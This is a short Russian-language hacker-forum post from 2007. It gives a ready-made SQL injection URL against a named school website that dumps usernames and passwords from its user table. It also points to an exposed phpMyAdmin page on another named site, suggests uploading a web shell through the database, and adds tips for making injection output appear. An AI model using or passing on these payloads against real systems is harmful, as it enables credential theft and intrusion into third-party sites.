29.08.2007, 03:20
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408
Репутация:
861
|
|
http://gym1517.ru/index.php?page=online&msg=18+and(1=2)+union+select +1,concat(username,0x3a,passwd),3,4,5,6,7+from+use r/*
наслаждайся 
На http://sofs.ru нашел только phpMyAdmin:
http://sofs.ru/phpMyAdmin/
, что логично))
Ну если прав хватит на mysql.user (если у тебя там скуля) то через БД зальешь шелл
З.Ы. на будущее: Если поля сами по себе не появились, нужно сделать ошибку в синтаксисе запроса, как например здесь 1=2, ведь 1 не равно 2? Или просто минус поставить, т.е. msg=-18 или msg[]=18 (иногда прокатывает), или msg=999999999999999, т.е. число, которого нет в БД. Ну вообщем понятно)
Последний раз редактировалось n0ne; 29.08.2007 в 03:26..
|
|
|